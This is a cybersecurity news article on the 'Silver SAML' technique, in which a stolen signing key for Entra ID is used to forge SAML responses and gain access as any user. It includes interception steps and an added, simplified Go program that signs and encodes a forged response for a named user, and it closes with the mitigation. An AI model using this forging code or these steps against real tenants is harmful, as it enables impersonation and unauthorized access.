Saturday, October 5, 2024

New Silver SAML Attack Let Attackers Forge Any SAML Response To Entra ID


The SolarWinds compromise was one of the largest cyberattacks of recent years. The attackers planted malicious code in the Orion IT management and monitoring software and, in post-breach exploitation, used the Golden SAML technique to pivot into cloud services, affecting thousands of organizations worldwide, including agencies of the United States government.

After that attack, CISA recommended that organizations running hybrid environments move to a cloud identity system such as Entra ID.

However, a newly documented technique dubbed Silver SAML sidesteps that recommendation: it lets an attacker forge SAML responses to applications that rely on Entra ID as their identity provider.


Although the researchers rated the technique as a MODERATE risk to organizations in general, the impact depends on which signing key is compromised: where that key protects business-critical applications, Silver SAML gives unauthorized access to them, and the risk is SEVERE.

Silver SAML Attack

According to the report shared with Cyber Security News, many organizations use Entra ID as the identity provider for applications that authenticate with SAML.

By default, Entra ID generates a self-signed certificate for signing SAML responses, and only Entra ID holds its private key. Organizations can, however, upload an externally generated certificate and use it for SAML signing instead.

Silver SAML attack workflow (Source: Semperis)

Golden SAML is well known: it extracts the token-signing certificate from Active Directory Federation Services (AD FS) and uses it to forge SAML authentication responses.

Silver SAML needs no AD FS; it targets environments where Microsoft Entra ID itself is the SAML identity provider.

If an attacker obtains the private key of an externally generated certificate that was uploaded to Entra ID, the attacker can forge any SAML response they like and sign it with the same private key Entra ID uses. To the application, the forged response is indistinguishable from a genuine one.

If the attack succeeds, the attacker gains access to the application as any user of their choosing.

Issue Behind SAML And Signing Certificates

The core problem is that most organizations do not manage SAML signing certificates correctly.

Using externally generated certificates weakens SAML security because the private key then exists outside Entra ID, in places the organization has to protect itself.

In practice, the PFX files for these externally generated certificates, and the passwords that protect them, are often passed around over insecure channels such as Teams or Slack.

Even organizations that keep the certificates in Azure Key Vault, which is a reasonable place to store them, are exposed if the vault is compromised and the key is extracted from it.

In addition, many organizations manage SAML signing certificates externally instead of letting Entra ID generate and hold them.

Performing A Silver SAML Attack

To launch the attack in a Service Provider-initiated (SP-initiated) flow, the threat actor intercepts the SAML response on its way from the browser to the application and replaces it with a forged one. An intercepting proxy such as Burp Suite is all that is needed for this.

The researchers demonstrated the attack in a test flow, intercepting the SAML response for the user oktaAdministrator@xd6z7.onmicrosoft.com.

To forge a response for a target user, the attacker first needs that user's claim values, such as the UPN (User Principal Name), surname, first name, displayName and objectID. These can be read from the Entra admin center or through the Microsoft Graph API.

Intercepting the SAML response (Source: Semperis)

With SilverSAMLForger, a tool the researchers created, the attacker turns these parameters into a forged SAML response, signed with the compromised key, output as a base64 and URL-encoded string.

This forged SAML response then replaces the genuine one in the intercepted request to the application, which logs the attacker in as the targeted user.
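The following Go program is an added example, written for this page; it is not SilverSAMLForger and not code from Semperis or the article. It models the steps above end to end: an attacker who holds the private key of the externally generated certificate builds a response for a chosen user, signs it, and base64- and URL-encodes it for the SAMLResponse field, while a service provider that knows only the key registered for Entra ID accepts the forgery and rejects the same response signed with any other key. One simplification, named plainly: the signature here is RSA-SHA256 over the serialized Assertion element carried in a Signature element, not a full enveloped XML-DSig with exclusive canonicalization; the trust property it demonstrates is the same. The issuer URL, objectID and name values are constructed placeholders; only the UPN comes from the article. Standard library only.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"net/url"
)

// Assertion holds the claims the SP trusts the IdP to assert. Claim names
// follow the article; the XML layout is a simplified stand-in for SAML 2.0.
type Assertion struct {
	XMLName     xml.Name `xml:"Assertion"`
	Issuer      string   `xml:"Issuer"`
	NameID      string   `xml:"Subject>NameID"`
	UPN         string   `xml:"AttributeStatement>UPN"`
	GivenName   string   `xml:"AttributeStatement>givenname"`
	Surname     string   `xml:"AttributeStatement>surname"`
	DisplayName string   `xml:"AttributeStatement>displayName"`
	ObjectID    string   `xml:"AttributeStatement>objectidentifier"`
}

// Response is what the browser posts to the SP's Assertion Consumer Service.
// Signature is base64(RSA-SHA256 over the serialized Assertion), standing in
// for the enveloped XML-DSig block a real IdP emits.
type Response struct {
	XMLName   xml.Name  `xml:"Response"`
	Assertion Assertion `xml:"Assertion"`
	Signature string    `xml:"Signature"`
}

// assertionDigest is the value both signer and verifier work on. Marshal of
// a struct of plain strings cannot fail, so its error is dropped.
func assertionDigest(a Assertion) []byte {
	raw, _ := xml.Marshal(a)
	sum := sha256.Sum256(raw)
	return sum[:]
}

// ForgeSAMLResponse plays the role of SilverSAMLForger: it signs whatever
// claims the attacker chooses with the key the attacker holds. If that key is
// the private key of the externally generated certificate uploaded to Entra
// ID, the SP cannot tell the result from a genuine response. The output is
// base64- then URL-encoded, ready to replace the intercepted SAMLResponse.
func ForgeSAMLResponse(signingKey *rsa.PrivateKey, claims Assertion) (string, error) {
	sig, err := rsa.SignPKCS1v15(rand.Reader, signingKey, crypto.SHA256, assertionDigest(claims))
	if err != nil {
		return "", err
	}
	raw, err := xml.Marshal(Response{Assertion: claims, Signature: base64.StdEncoding.EncodeToString(sig)})
	if err != nil {
		return "", err
	}
	return url.QueryEscape(base64.StdEncoding.EncodeToString(raw)), nil
}

// VerifySAMLResponse is the SP side. It checks only that the signature
// matches the public key registered for the IdP, which is exactly why a
// forgery made with the same private key passes while any other key fails.
func VerifySAMLResponse(samlResponse string, idpKey *rsa.PublicKey) (Assertion, error) {
	b64, err := url.QueryUnescape(samlResponse)
	if err != nil {
		return Assertion{}, err
	}
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return Assertion{}, err
	}
	var resp Response
	if err := xml.Unmarshal(raw, &resp); err != nil {
		return Assertion{}, err
	}
	sig, err := base64.StdEncoding.DecodeString(resp.Signature)
	if err != nil {
		return Assertion{}, err
	}
	if err := rsa.VerifyPKCS1v15(idpKey, crypto.SHA256, assertionDigest(resp.Assertion), sig); err != nil {
		return Assertion{}, fmt.Errorf("signature does not match the IdP key: %w", err)
	}
	return resp.Assertion, nil
}

func main() {
	// Constructed scenario: stolenKey stands in for the private key of the
	// externally generated certificate, which Entra ID signs with and the
	// attacker extracted from the PFX. The SP has registered the public half.
	stolenKey, _ := rsa.GenerateKey(rand.Reader, 2048)
	victim := Assertion{
		Issuer: "https://sts.windows.net/example-tenant/", // placeholder issuer
		NameID: "oktaAdministrator@xd6z7.onmicrosoft.com", UPN: "oktaAdministrator@xd6z7.onmicrosoft.com",
		GivenName: "Okta", Surname: "Administrator", DisplayName: "Okta Administrator",
		ObjectID: "00000000-0000-0000-0000-000000000001", // placeholder objectID
	}
	forged, _ := ForgeSAMLResponse(stolenKey, victim)
	who, err := VerifySAMLResponse(forged, &stolenKey.PublicKey)
	fmt.Println("stolen key ->", who.UPN, err)
	otherKey, _ := rsa.GenerateKey(rand.Reader, 2048)
	_, err = VerifySAMLResponse(forged, &otherKey.PublicKey)
	fmt.Println("other key  ->", err)
}
```

Nothing in the accepted response tells the SP who used the key; the check is key-only, so the same code path run with a key pulled out of a leaked PFX or a compromised Key Vault is the attack. That is also why moving the application back to an Entra ID-generated signing certificate, whose private key never leaves Entra ID, closes this route.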


Eswar
Eswar is a cybersecurity content editor with a passion for creating captivating and informative content. With years of experience in cybersecurity, he covers cybersecurity news, technology and other news.
